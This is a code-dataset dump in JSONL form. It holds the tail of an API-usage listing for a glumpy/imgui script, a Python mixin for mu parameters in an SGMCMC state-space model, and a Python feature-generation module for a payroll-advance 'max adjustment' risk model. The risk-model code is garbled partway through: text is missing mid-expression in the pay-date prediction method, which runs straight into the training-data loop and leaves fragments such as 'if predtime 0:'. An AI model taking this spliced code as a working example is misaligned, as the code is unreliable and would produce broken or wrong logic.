"line_number": 38, "usage_type": "name"}, {"api_name": "glumpy.geometry.colorcube", "line_number": 42, "usage_type": "call"}, {"api_name": "glumpy.gloo.VertexBuffer", "line_number": 43, "usage_type": "attribute"}, {"api_name": "glumpy.gloo", "line_number": 43, "usage_type": "name"}, {"api_name": "glumpy.gloo.IndexBuffer", "line_number": 44, "usage_type": "attribute"}, {"api_name": "glumpy.gloo", "line_number": 44, "usage_type": "name"}, {"api_name": "glumpy.gloo.IndexBuffer", "line_number": 45, "usage_type": "attribute"}, {"api_name": "glumpy.gloo", "line_number": 45, "usage_type": "name"}, {"api_name": "glumpy.gloo.Program", "line_number": 47, "usage_type": "call"}, {"api_name": "glumpy.gloo", "line_number": 47, "usage_type": "name"}, {"api_name": "glumpy.transforms.TrackballPan", "line_number": 51, "usage_type": "call"}, {"api_name": "glumpy.transforms.Position", "line_number": 51, "usage_type": "call"}, {"api_name": "imgui.new_frame", "line_number": 66, "usage_type": "call"}, {"api_name": "imgui.begin_main_menu_bar", "line_number": 68, "usage_type": "call"}, {"api_name": "imgui.begin_menu", "line_number": 69, "usage_type": "call"}, {"api_name": "imgui.menu_item", "line_number": 70, "usage_type": "call"}, {"api_name": "imgui.end_menu", "line_number": 73, "usage_type": "call"}, {"api_name": "imgui.end_main_menu_bar", "line_number": 75, "usage_type": "call"}, {"api_name": "imgui.begin", "line_number": 77, "usage_type": "call"}, {"api_name": "imgui.slider_float", "line_number": 78, "usage_type": "call"}, {"api_name": "imgui.end", "line_number": 80, "usage_type": "call"}, {"api_name": "imgui.end_frame", "line_number": 82, "usage_type": "call"}, {"api_name": "imgui.render", "line_number": 83, "usage_type": "call"}, {"api_name": "glumpy.gl.glDisable", "line_number": 89, "usage_type": "call"}, {"api_name": "glumpy.gl", "line_number": 89, "usage_type": "name"}, {"api_name": "glumpy.gl.GL_BLEND", "line_number": 89, "usage_type": "attribute"}, {"api_name": "glumpy.gl.glEnable", "line_number": 90, "usage_type": "call"}, {"api_name": "glumpy.gl", "line_number": 90, "usage_type": "name"}, {"api_name": "glumpy.gl.GL_DEPTH_TEST", "line_number": 90, "usage_type": "attribute"}, {"api_name": "glumpy.gl.glEnable", "line_number": 91, "usage_type": "call"}, {"api_name": "glumpy.gl", "line_number": 91, "usage_type": "name"}, {"api_name": "glumpy.gl.GL_POLYGON_OFFSET_FILL", "line_number": 91, "usage_type": "attribute"}, {"api_name": "glumpy.gl.GL_TRIANGLES", "line_number": 93, "usage_type": "attribute"}, {"api_name": "glumpy.gl", "line_number": 93, "usage_type": "name"}, {"api_name": "glumpy.gl.glDisable", "line_number": 96, "usage_type": "call"}, {"api_name": "glumpy.gl", "line_number": 96, "usage_type": "name"}, {"api_name": "glumpy.gl.GL_POLYGON_OFFSET_FILL", "line_number": 96, "usage_type": "attribute"}, {"api_name": "glumpy.gl.glEnable", "line_number": 97, "usage_type": "call"}, {"api_name": "glumpy.gl", "line_number": 97, "usage_type": "name"}, {"api_name": "glumpy.gl.GL_BLEND", "line_number": 97, "usage_type": "attribute"}, {"api_name": "glumpy.gl.glDepthMask", "line_number": 98, "usage_type": "call"}, {"api_name": "glumpy.gl", "line_number": 98, "usage_type": "name"}, {"api_name": "glumpy.gl.GL_FALSE", "line_number": 98, "usage_type": "attribute"}, {"api_name": "glumpy.gl.GL_LINES", "line_number": 100, "usage_type": "attribute"}, {"api_name": "glumpy.gl", "line_number": 100, "usage_type": "name"}, {"api_name": "glumpy.gl.glDepthMask", "line_number": 101, "usage_type": "call"}, {"api_name": "glumpy.gl", "line_number": 101, "usage_type": "name"}, {"api_name": "glumpy.gl.GL_TRUE", "line_number": 101, "usage_type": "attribute"}, {"api_name": "imgui.get_draw_data", "line_number": 103, "usage_type": "call"}, {"api_name": "imgui.create_context", "line_number": 110, "usage_type": "call"}, {"api_name": "imgui.integrations.glfw.GlfwRenderer", "line_number": 111, "usage_type": "call"}, {"api_name": "glumpy.gl.glEnable", "line_number": 115, "usage_type": "call"}, {"api_name": "glumpy.gl", "line_number": 115, "usage_type": "name"}, {"api_name": "glumpy.gl.GL_DEPTH_TEST", "line_number": 115, "usage_type": "attribute"}, {"api_name": "glumpy.gl.glPolygonOffset", "line_number": 116, "usage_type": "call"}, {"api_name": "glumpy.gl", "line_number": 116, "usage_type": "name"}, {"api_name": "glumpy.gl.glEnable", "line_number": 117, "usage_type": "call"}, {"api_name": "glumpy.gl", "line_number": 117, "usage_type": "name"}, {"api_name": "glumpy.gl.GL_LINE_SMOOTH", "line_number": 117, "usage_type": "attribute"}, {"api_name": "glumpy.gl.glBlendFunc", "line_number": 118, "usage_type": "call"}, {"api_name": "glumpy.gl", "line_number": 118, "usage_type": "name"}, {"api_name": "glumpy.gl.GL_SRC_ALPHA", "line_number": 118, "usage_type": "attribute"}, {"api_name": "glumpy.gl.GL_ONE_MINUS_SRC_ALPHA", "line_number": 118, "usage_type": "attribute"}, {"api_name": "glumpy.app.run", "line_number": 122, "usage_type": "call"}, {"api_name": "glumpy.app", "line_number": 122, "usage_type": "name"}]} +{"seq_id": "413778925", "text": "import numpy as np\nimport logging\nfrom .._utils import normal_logpdf\nlogger = logging.getLogger(name=__name__)\n\n\nclass MuMixin(object):\n # Mixin for Mu[0], ..., Mu[num_states-1] variables\n def _set_dim(self, **kwargs):\n if 'mu' in kwargs:\n num_states, m = np.shape(kwargs['mu'])\n else:\n raise ValueError(\"mu not provided\")\n\n if \"num_states\" in self.dim:\n if num_states != self.dim['num_states']:\n raise ValueError(\"mu.shape[0] does not match existing dims\")\n else:\n self.dim['num_states'] = num_states\n if \"m\" in self.dim:\n if m != self.dim['m']:\n raise ValueError(\"mu.shape[1] does not match existing dims\")\n else:\n self.dim['m'] = m\n super()._set_dim(**kwargs)\n return\n\n def _set_var_dict(self, **kwargs):\n if 'mu' in kwargs:\n self.var_dict['mu'] = np.array(kwargs['mu']).astype(float)\n else:\n raise ValueError(\"mu not provided\")\n\n super()._set_var_dict(**kwargs)\n return\n\n @classmethod\n def _from_dict_to_vector(cls, vector_list, var_dict, **kwargs):\n vector_list.append(var_dict['mu'].flatten())\n return super()._from_dict_to_vector(vector_list, var_dict, **kwargs)\n\n @classmethod\n def _from_vector_to_dict(cls, var_dict, vector, **kwargs):\n num_states, m = kwargs['num_states'], kwargs['m']\n mu = np.reshape(vector[0:num_states*m], (num_states, m))\n var_dict['mu'] = mu\n var_dict = super()._from_vector_to_dict(\n var_dict, vector[num_states*m:], **kwargs)\n return var_dict\n\n @property\n def mu(self):\n mu = self.var_dict['mu']\n return mu\n @mu.setter\n def mu(self, mu):\n self.var_dict['mu'] = mu\n return\n\n @property\n def num_states(self):\n return self.dim['num_states']\n @property\n def m(self):\n return self.dim['m']\n\n\nclass MuPrior(object):\n # Mixin for Mu variable\n def _set_hyperparams(self, **kwargs):\n if 'mean_mu' in kwargs:\n num_states, m = np.shape(kwargs['mean_mu'])\n else:\n raise ValueError(\"mean_mu must be provided\")\n if 'var_col_mu' in kwargs:\n num_states2 = np.shape(kwargs['var_col_mu'])[0]\n else:\n raise ValueError(\"mean_mu must be provided\")\n\n if num_states != num_states2:\n raise ValueError(\"mean_mu + var_col_mu don't match\")\n\n if \"num_states\" in self.dim:\n if num_states != self.dim['num_states']:\n raise ValueError(\"num_states do not match existing dims\")\n else:\n self.dim['num_states'] = num_states\n if \"m\" in self.dim:\n if m != self.dim['m']:\n raise ValueError(\"m do not match existing dims\")\n else:\n self.dim['m'] = m\n\n self.hyperparams['mean_mu'] = kwargs['mean_mu']\n self.hyperparams['var_col_mu'] = kwargs['var_col_mu']\n super()._set_hyperparams(**kwargs)\n return\n\n def _sample_prior_var_dict(self, var_dict, **kwargs):\n # Requires Rinvs defined\n mean_mu = self.hyperparams['mean_mu']\n var_col_mu = self.hyperparams['var_col_mu']\n if \"Rinvs\" in kwargs:\n Rinvs = kwargs['Rinvs']\n elif \"Rinv\" in kwargs:\n Rinvs = np.array([kwargs['Rinv']\n for _ in range(self.dim['num_states'])])\n else:\n raise ValueError(\"Missing Covariance\")\n\n mus = [None for k in range(self.dim['num_states'])]\n for k in range(len(mus)):\n mu_k = np.random.multivariate_normal(\n mean=mean_mu[k],\n cov=var_col_mu[k]*np.linalg.inv(Rinvs[k]),\n )\n\n mus[k] = mu_k\n var_dict['mu'] = np.array(mus)\n var_dict = super()._sample_prior_var_dict(var_dict, **kwargs)\n return var_dict\n\n def _sample_post_var_dict(self, var_dict, sufficient_stat, **kwargs):\n # Requires Rinvs defined\n mean_mu = self.hyperparams['mean_mu']\n var_col_mu = self.hyperparams['var_col_mu']\n if \"Rinvs\" in kwargs:\n Rinvs = kwargs['Rinvs']\n elif \"Rinv\" in kwargs:\n Rinvs = np.array([kwargs['Rinv']\n for _ in range(self.dim['num_states'])])\n else:\n raise ValueError(\"Missing Covariance\")\n\n mus = [None for k in range(self.dim['num_states'])]\n for k in range(0, self.dim['num_states']):\n S_prevprev = var_col_mu[k]**-1 + sufficient_stat['S_prevprev'][k]\n S_curprev = \\\n var_col_mu[k]**-1*mean_mu[k] + sufficient_stat['S_curprev'][k]\n post_mean_mu_k = S_curprev/S_prevprev\n mu_k = np.random.multivariate_normal(\n mean=post_mean_mu_k,\n cov=np.linalg.inv(Rinvs[k])/S_prevprev,\n )\n\n mus[k] = mu_k\n var_dict['mu'] = np.array(mus)\n var_dict = super()._sample_post_var_dict(\n var_dict, sufficient_stat, **kwargs)\n return var_dict\n\n def _logprior(self, logprior, parameters, **kwargs):\n mean_mu = self.hyperparams['mean_mu']\n var_col_mu = self.hyperparams['var_col_mu']\n for mu_k, mean_mu_k, var_col_mu_k, LRinv_k in zip(parameters.mu,\n mean_mu, var_col_mu, parameters.LRinv):\n logprior += normal_logpdf(mu_k,\n mean=mean_mu_k,\n Lprec=var_col_mu_k**0.5 * LRinv_k,\n )\n\n logprior = super()._logprior(logprior, parameters, **kwargs)\n return logprior\n\n def _grad_logprior(self, grad, parameters, **kwargs):\n mean_mu = self.hyperparams['mean_mu']\n var_col_mu = self.hyperparams['var_col_mu']\n Rinv = parameters.Rinv\n grad_mu = np.array([\n -1.0*np.dot(var_col_mu[k]**-1 * Rinv[k],\n parameters.mu[k] - mean_mu[k])\n for k in range(self.dim['num_states'])\n ])\n grad['mu'] = grad_mu\n grad = super()._grad_logprior(grad, parameters, **kwargs)\n return grad\n\n @classmethod\n def _get_default_kwargs(cls, default_kwargs, **kwargs):\n num_states = kwargs['num_states']\n m = kwargs['m']\n var = kwargs['var']\n\n default_kwargs['mean_mu'] = np.zeros((num_states, m), dtype=float)\n default_kwargs['var_col_mu'] = np.array([\n var for _ in range(num_states)\n ], dtype=float)\n\n default_kwargs = super()._get_default_kwargs(default_kwargs, **kwargs)\n return default_kwargs\n\n @classmethod\n def _get_prior_kwargs(cls, prior_kwargs, parameters, **kwargs):\n var = kwargs['var']\n if kwargs.get('from_mean', False):\n mean_mu = parameters.mu\n else:\n mean_mu = np.zeros_like(parameters.mu, dtype=float)\n var_col_mu = np.array([\n var*1.0 for _ in range(parameters.num_states)\n ], dtype=float)\n\n prior_kwargs['mean_mu'] = mean_mu\n prior_kwargs['var_col_mu'] = var_col_mu\n prior_kwargs = super()._get_prior_kwargs(\n prior_kwargs, parameters, **kwargs)\n return prior_kwargs\n\n def _get_R_hyperparam_mean_var_col(self):\n return self.hyperparams['mean_mu'], self.hyperparams['var_col_mu']\n\n\nclass MuPreconditioner(object):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n return\n\n def _precondition(self, precond_grad, grad, parameters, **kwargs):\n R = parameters.R\n precond_mu = np.array([\n np.dot(R[k], grad['mu'][k])\n for k in range(parameters.num_states)\n ])\n precond_grad['mu'] = precond_mu\n precond_grad = super()._precondition(precond_grad, grad,\n parameters, **kwargs)\n return precond_grad\n\n def _precondition_noise(self, noise, parameters, **kwargs):\n LRinv = parameters.LRinv\n precond_mu = np.array([\n np.linalg.solve(LRinv[k].T,\n np.random.normal(loc=0, size=(parameters.m)),\n )\n for k in range(parameters.num_states)\n ])\n noise['mu'] = precond_mu\n super()._precondition_noise(noise, parameters, **kwargs)\n return noise\n\n def _correction_term(self, correction, parameters, **kwargs):\n correction['mu'] = np.zeros_like(parameters.mu, dtype=float)\n super()._correction_term(correction, parameters, **kwargs)\n return correction\n\n", "sub_path": "code/sgmcmc_ssm/variable_mixins/mu_variable.py", "file_name": "mu_variable.py", "file_ext": "py", "file_size_in_byte": 8571, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.random.multivariate_normal", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 113, "usage_type": "attribute"}, {"api_name": "numpy.linalg.inv", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 115, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.random.multivariate_normal", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 141, "usage_type": "attribute"}, {"api_name": "numpy.linalg.inv", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 143, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 147, "usage_type": "call"}, {"api_name": "_utils.normal_logpdf", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 231, "usage_type": "call"}, {"api_name": "numpy.linalg.solve", "line_number": 232, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 232, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 233, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 233, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 242, "usage_type": "call"}]} +{"seq_id": "166675300", "text": "import ah_config\nimport ah_datadog\nimport ah_db\nimport csv\nimport os\nimport pandas as pd\nimport time\nimport traceback\nfrom modeling.feature.feature_activation import ActivationFeature, Restore\nfrom modeling.feature.feature_bank import BankFeature_predict, BankFeature\nfrom modeling.feature.feature_payroll import Payroll\nfrom modeling.feature.feature_device import DeviceFeature\nfrom modeling.feature.feature_season import SeasonFeature\nfrom modeling.feature.feature_user import UserFeature\nfrom modeling.feature.feature_employment import EmploymentFeature\nfrom modeling.feature.feature_cs import CSFeature\nfrom modeling.feature.feature_timesheet import TimeSheetFeature\nfrom datetime import datetime, timedelta\nfrom modeling.feature.feature_generator import FeatureGenerator\nfrom modeling.feature.feature_new import NewFeature\nfrom modeling.feature.feature_currentMax import CurrentMaxFeature\nfrom modeling.misc.misc import get_df\nfrom multiprocessing import Pool\n\n\nclass MaxAdjustmentModel:\n def __init__(self):\n self.dummyVar=[]\n self.pkl_path = os.path.dirname(os.path.abspath(__file__))+'/'\n\n def getAllUserId(self):\n\n start_date = '2018-11-01'\n end_date = '2018-12-31'\n\n sql_money = '''\n SELECT distinct ft.userid\n FROM fundstransfers ft\n JOIN transferattempts ta\n ON ta.FundsTransferId = ft.FundsTransferId\n WHERE ft.FundsTransferReasonId = 2 \n AND ft.postingdate between '{0}' and '{1}'\n AND ta.FundsTransferStatusId in (5, 7)\n AND ta.TransferAttemptId = GetDefiningTransferAttemptId(ft.FundsTransferId)\n ORDER BY ft.userid\n '''.format(start_date, end_date)\n\n with ah_db.open_mysql_cursor('moneyMovement') as cursor:\n cursor.execute(sql_money)\n df_money = pd.DataFrame(cursor.fetchall())\n\n with ah_db.open_mysql_cursor('miscellaneous') as cursor:\n sql_misc = '''SELECT userid from testusers'''\n cursor.execute(sql_misc)\n df_misc = pd.DataFrame(cursor.fetchall())\n\n df = df_money.merge(df_misc, on='userid', how='left', indicator=True)\n df = df['userid'][df['_merge'] == 'left_only']\n return [l for l in df]\n\n\n def createDerivedFeature(self,fg):\n self.dummyVar=['actDayOfWeek','derived_employerid','cs_lastAudit1Username','cs_lastAuditSource','cs_lastAuditType',\n 'cs_lastAuditUsername','device_lastInstallOS','payroll_lastPayrollSetupBy','payroll_paycycleFrequencyId','payroll_paytypeid'\n ]\n\n if fg.f['activation_aveAmtPerAct_Wk12']>99.9: fg.f['derived_aveAmtPerAct_Wk12_100']=1\n else: fg.f['derived_aveAmtPerAct_Wk12_100']=0\n\n if fg.f['activation_aveCntActCancel_Wk2']>0: fg.f['derived_aveCntActCancel_Wk2_GT0']=1\n else: fg.f['derived_aveCntActCancel_Wk2_GT0']=0\n\n if fg.f['activation_aveDayGapAct_Wk2']>13: fg.f['derived_aveDayGapAct_Wk2_14']=1\n else: fg.f['derived_aveDayGapAct_Wk2_14']=0\n\n if fg.f['activation_aveTip_Wk2']>9: fg.f['derived_aveTip_Wk2_GT9']=1\n else: fg.f['derived_aveTip_Wk2_GT9']=0\n\n if fg.f['activation_aveTip_Wk12']>9: fg.f['derived_aveTip_Wk12_GT9']=1\n else: fg.f['derived_aveTip_Wk12_GT9']=0\n\n fg.f['derived_daySinceLastFailRestoreGT90']=fg.f['derived_daySinceLastFailRestore61to90']=fg.f['derived_daySinceLastFailRestore31to60']=fg.f['derived_daySinceLastFailRestore15to30']=fg.f['activation_derived_daySinceLastFailRestoreLT15']=0\n if fg.f['activation_daySinceLastFailRestore']>90: fg.f['derived_daySinceLastFailRestoreGT90']=1\n elif fg.f['activation_daySinceLastFailRestore']>60: fg.f['derived_daySinceLastFailRestore61to90']=1\n elif fg.f['activation_daySinceLastFailRestore']>30: fg.f['derived_daySinceLastFailRestore31to60']=1\n elif fg.f['activation_daySinceLastFailRestore']>14: fg.f['derived_daySinceLastFailRestore15to30']=1\n else: fg.f['activation_derived_daySinceLastFailRestoreLT15']=1\n\n fg.f['derived_daySinceLastRestoreGT30']=fg.f['derived_daySinceLastRestore15to30']=fg.f['derived_daySinceLastRestoreLT15']=0\n if fg.f['activation_daySinceLastRestore']>30: fg.f['derived_daySinceLastRestoreGT30']=1\n elif fg.f['activation_daySinceLastRestore']>14: fg.f['derived_daySinceLastRestore15to30']=1\n else: fg.f['derived_daySinceLastRestoreLT15']=1\n\n\n fg.f['derived_employerid']=fg.f['employment_employer']\n\n if fg.f['payroll_hourlyRate'] is None:\n fg.f['derived_hourlyRateGT20'] = 0\n elif fg.f['payroll_hourlyRate'] > 20:\n fg.f['derived_hourlyRateGT20'] = 1\n else:\n fg.f['derived_hourlyRateGT20'] = 0\n\n if fg.f['payroll_lastPayrollStatus']!=11: fg.f['derived_lastPayrollStatus11']=0\n else: fg.f['derived_lastPayrollStatus11']=1\n\n if fg.f['cs_nCredit']>0: fg.f['derived_hasCSCredit']=1\n else: fg.f['derived_hasCSCredit']=0\n\n if fg.f['employment_nEmployer']>5: fg.f['derived_nEmployerGT5']=1\n else: fg.f['derived_nEmployerGT5']=0\n\n def createInterFeature(self, fg):\n\n fg.f['bank_employer'] = str(fg.f['bank_getInstitutionId']) + '_' + str(fg.f['employment_employer'])\n fg.f['inter_amtActCurrent_aveAmtAct_Wk12'] = fg.f['activation_amtActCurrent'] / (\n fg.f['activation_aveAmtAct_Wk12'] + 0.01)\n fg.f['inter_amtActCurrent_aveAmtAct_Wk2'] = fg.f['activation_amtActCurrent'] / (\n fg.f['activation_aveAmtAct_Wk2'] + 0.01)\n fg.f['inter_amtActCurrent_aveAmtAct_trend'] = fg.f['inter_amtActCurrent_aveAmtAct_Wk2'] / (\n fg.f['inter_amtActCurrent_aveAmtAct_Wk12'] + 0.01)\n del fg.f['inter_amtActCurrent_aveAmtAct_Wk12']\n fg.f['inter_weekly_act_cnt_Wk2'] = fg.f['activation_amtActCurrent'] / (\n fg.f['activation_aveAmtPerAct_Wk2'] + 0.01)\n fg.f['inter_AmtPerAct_Wk2'] = fg.f['activation_amtActCurrent'] / (fg.f['activation_aveCntAct_Wk2'] + 0.01)\n fg.f['inter_amtActCurrent_aveEarning'] = fg.f['activation_amtActCurrent'] / (fg.f[\n 'bank_avgAmountPerEarningWithinNWeeksN_2'] + 0.01)\n\n @ah_datadog.datadog_timed(name=\"getAllFeatures\", tags=[\"operation:maxAdjustment\"])\n def getAllFeatures(self,uid):\n\n # print(\"Start calculating features for %d\"%uid)\n log = ah_config.getLogger('ah.max_adjustment_model')\n start = time.time()\n activation = ActivationFeature(uid)\n end = time.time()\n log.debug('Time elapsed for activation feature queries: '\n '%d sec for user %s', end-start, uid)\n start = end\n\n bank = BankFeature_predict(uid)\n end = time.time()\n log.debug('Time elapsed for bank feature queries: '\n '%d sec for user %s', end-start, uid)\n start = end\n\n payroll = Payroll(uid)\n end = time.time()\n log.debug('Time elapsed for payroll feature queries: '\n '%d sec for user %s', end-start, uid)\n start = end\n\n device = DeviceFeature(uid)\n end = time.time()\n log.debug('Time elapsed for device feature queries: '\n '%d sec for user %s', end-start, uid)\n start = end\n\n user = UserFeature(uid)\n end = time.time()\n log.debug('Time elapsed for user feature queries: '\n '%d sec for user %s', end-start, uid)\n start = end\n\n employment = EmploymentFeature(uid)\n end = time.time()\n log.debug('Time elapsed for employment feature queries: '\n '%d sec for user %s', end-start, uid)\n start = end\n\n cs = CSFeature(uid)\n end = time.time()\n log.debug('Time elapsed for CS feature queries: '\n '%d sec for user %s', end-start, uid)\n start = end\n\n #pip = PIPFeature(uid)\n #end = time.time()\n #log.debug('Time elapsed for PIP feature queries: '\n # '%d sec for user %s', end-start, uid)\n #start = end\n\n timesheet = TimeSheetFeature(uid)\n end = time.time()\n log.debug('Time elapsed for timesheet feature queries: '\n '%d sec for user %s', end-start, uid)\n start = end\n\n new = NewFeature(uid)\n end = time.time()\n log.debug('Time elapsed for new feature queries: '\n '%d sec for user %s', end-start, uid)\n start = end\n\n currentMax = CurrentMaxFeature(uid)\n end = time.time()\n log.debug('Time elapsed for max feature queries: '\n '%d sec for user %s', end - start, uid)\n start = end\n\n season = SeasonFeature()\n end = time.time()\n log.debug('Time elapsed for season feature queries: '\n '%d sec', end - start)\n\n# if len(payroll.data) == 0 or len(activation.data)==0:\n# print(\"no payroll data or no activation data %d\" % uid)\n\n# return None\n# else:\n\n predTime = datetime.utcnow() #+ timedelta(hours=-4)\n # datetime.now(eastern)\n\n fg = FeatureGenerator(uid, predTime)\n\n currentact={}\n currentact['RequestTime']=predTime\n currentact['IsFail']=None\n currentact['IsLoss']=None\n currentact['RestoreReturnCodeAch']=None\n currentact['Amount']=100\n currentact['RestoreDate']=predTime\n currentact['ActivationDate']=predTime\n currentact['activationid']=0\n\n # print((predTime-activation.data[-1]['RequestTime']).total_seconds())\n if len(activation.data)>0 and (predTime-activation.data[-1]['RequestTime']).total_seconds()<60:\n currentact=activation.data.pop()\n\n fg.feature_currentActivation(currentact)\n fg.feature_generator(activation)\n fg.feature_generator(payroll)\n fg.feature_generator(device)\n fg.feature_generator(season)\n fg.feature_generator(user)\n fg.feature_generator(employment)\n fg.feature_generator(cs)\n fg.feature_generator(bank)\n # fg.feature_generator(pip)\n fg.feature_generator(timesheet)\n fg.feature_generator(new)\n fg.feature_generator(currentMax)\n self.createDerivedFeature(fg)\n self.createInterFeature(fg)\n return fg\n\n def get_pay_dates(self, uid):\n sql = '''SELECT distinct CAST(paydate AS DATETIME) as paydate \n FROM Payroll.PayrollActiveStatusTracking \n Where UserId = {} order by paydate'''.format(uid)\n rows = ah_db.execute_to_json('payroll', sql)\n return [l['paydate'] for l in rows]\n\n def getPredTimeTarget(self,activation,uid):\n\n restore={}\n\n for l in activation.data:\n\n rdate=l['RestoreDate']\n\n if l['ActFail']==0:\n if rdate not in restore: restore[rdate]=Restore(l)\n else: restore[rdate].update(l)\n\n paydates = self.get_pay_dates(uid)\n\n predTimeTarget=[]\n\n rdates=sorted(restore.keys(),reverse=True)\n\n # print(rdates)\n for i in range(0,len(rdates)-2):\n rdate=rdates[i]\n r=restore[rdate]\n predtime=rdate-timedelta(7)\n while len(paydates)>0 and paydates[-1]>=rdate:\n paydates.pop()\n if len(paydates)>0:\n if (rdate-paydates[-1]).days<35 and paydates[-1]predtime: predtime=rdates[i+1]\n\n # print(predtime)\n predtime=predtime-timedelta(2)\n if predtime 0:\n if n % 1000 == 0:\n print(n)\n n += 1\n try:\n uid = uids.pop()\n print('uid=' + str(uid))\n uid = int(uid)\n activation = ActivationFeature(uid,scoring=False)\n bank = BankFeature(uid)\n payroll = Payroll(uid)\n device = DeviceFeature(uid)\n user = UserFeature(uid)\n employment = EmploymentFeature(uid)\n cs = CSFeature(uid)\n # pip = PIPFeature(uid)\n timesheet = TimeSheetFeature(uid)\n new = NewFeature(uid)\n currentMax = CurrentMaxFeature(uid)\n season = SeasonFeature()\n #print(\"initialized feature objects for user:{}\".format(uid))\n # break\n # if len(payroll.data) == 0:\n # print(\"no payroll data %d\" % uid)\n # continue\n\n # print(uid, datetime.now())\n # self.conn.close()\n # self.conn = connect_db(30)\n # print('Datebase reconnected!')\n\n predtimetarget=self.getPredTimeTarget(activation,uid)\n except:\n print(uid, traceback.format_exc())\n uids.append(uid)\n return uids\n\n\n for pt in predtimetarget:\n # print (uid,pt)\n\n predTime = pt[2]\n\n if predTime > datetime(2017, 10, 31):\n\n fg = FeatureGenerator(uid, predTime)\n\n fg.f['IsFail']=pt[0]\n fg.f['IsLoss']=pt[1]\n fg.feature_generator(activation)\n fg.feature_generator(bank)\n fg.feature_generator(payroll)\n fg.feature_generator(device)\n fg.feature_generator(season)\n fg.feature_generator(user)\n fg.feature_generator(employment)\n fg.feature_generator(cs)\n # fg.feature_generator(pip)\n fg.feature_generator(timesheet)\n fg.feature_generator(new)\n fg.feature_generator(currentMax)\n try:\n self.createDerivedFeature(fg)\n self.createInterFeature(fg)\n except:\n print(uid)\n print(traceback.format_exc())\n if writer is None:\n fieldnames = list(fg.f.keys())\n writer = csv.DictWriter(fout, fieldnames=fieldnames)\n\n writer.writeheader()\n\n fg.printFeatures(writer)\n\n return uids\n\n def testScore(self):\n filepath = './modeling/model/risk_model/activation_risk_model/log/'\n filename = 'score_tmp.csv'\n\n while True:\n try:\n fout = open(filepath+filename, 'w')\n break\n except IOError:\n os.mkdir(filepath)\n\n writer = csv.writer(fout, delimiter=',')\n writer.writerow(['UserId', 'Risk Score'])\n model = ActivationRiskModel()\n uids = model.getAllUserIdMaxAdjust()\n # uids = [23528]\n for uid in uids:\n try:\n fg = model.getAllFeatures(uid)\n\n try:\n score = model.getScore(fg.f)\n except:\n score = -1\n except:\n score = -10\n\n writer.writerow([uid, score])\n\n print(score)\n model.__writeDB__(fg.f)\n\n\ndef prepareTrainingData(uids):\n\n filepath = './modeling/model/risk_model/max_adjustment_model/data/'\n filename = 'master_%d.csv'%os.getpid()\n\n while True:\n try:\n fout = open(filepath+filename, 'a+', encoding='utf-8')\n break\n except IOError:\n os.mkdir(filepath)\n\n model = MaxAdjustmentModel()\n while len(uids) > 0:\n try:\n uids = model.createMaster(fout, uids)\n except:\n print(datetime.now(), \"restarted data generation\")\n\n fout.close()\n\n\ndef test(uid):\n log = ah_config.getLogger('ah.max_adjustment_model')\n log.info('connected to DB')\n import modeling.misc.predictor as pred\n ah_config.initialize()\n model = MaxAdjustmentModel()\n fg = model.getAllFeatures(uid)\n predictor = pred.Predictor(fg.f)\n predictor.getReasonCategory()\n return 1\n\n\nif __name__ == \"__main__\":\n filepath = './modeling/model/max_adjustment/data/'\n useridfile = 'alluserid.csv'\n\n ah_config.initialize()\n import os\n cmd = 'rm -f ' + filepath + 'master*.csv'\n os.system(cmd)\n\n model = MaxAdjustmentModel()\n uids = 8726\n fg = model.getAllFeatures(uids)\n print(fg.f)\n\n '''\n from numpy import *\n uids = model.getAllUserId()\n print(len(uids))\n from random import randint\n\n df = pd.DataFrame(uids)\n df.to_csv(filepath + useridfile)\n\n uids = pd.read_csv(filepath + useridfile)['0'].tolist()\n\n nprocess=8\n\n uids = [[uids[i] for i in range(len(uids)) if i % nprocess == x] for x in range(nprocess)]\n for i in uids: print(len(i))\n\n pool = Pool(processes=nprocess)\n uids = pool.map(prepareTrainingData, uids)\n '''\n\n\n\n # filename = 'master_*.csv'\n # cmd = ''\n # cmd = 'cat ' + filepath + filename + ' > '\n # os.system()\n\n\n # conn = connect_db(30)\n\n # filepath = './modeling/model/risk_model/activation_risk_model/data/'\n # filename = 'master.csv'\n\n # while True:\n # try:\n # fout = open(filepath+filename, 'w')\n # break\n # except IOError:\n # os.mkdir(filepath)\n\n\n\n # model = ActivationRiskModel(conn)\n # # # print (fg.f)\n # model.createMaster(fout)\n\n # fout.close()\n\n ###########################################\n # connection = connect_db(30)\n # uids = [45563,\n # 221451,\n # 220509,\n # 217584,\n # 218629,\n # 227137,\n # 223211,\n # 222097,\n # 210520,\n # 83029,\n # 151098,\n # 192160,\n # 223137,\n # 212042,\n # 221115]\n # uids = [60768]\n # model = MaxAdjustmentModel(connection)\n # for uid in 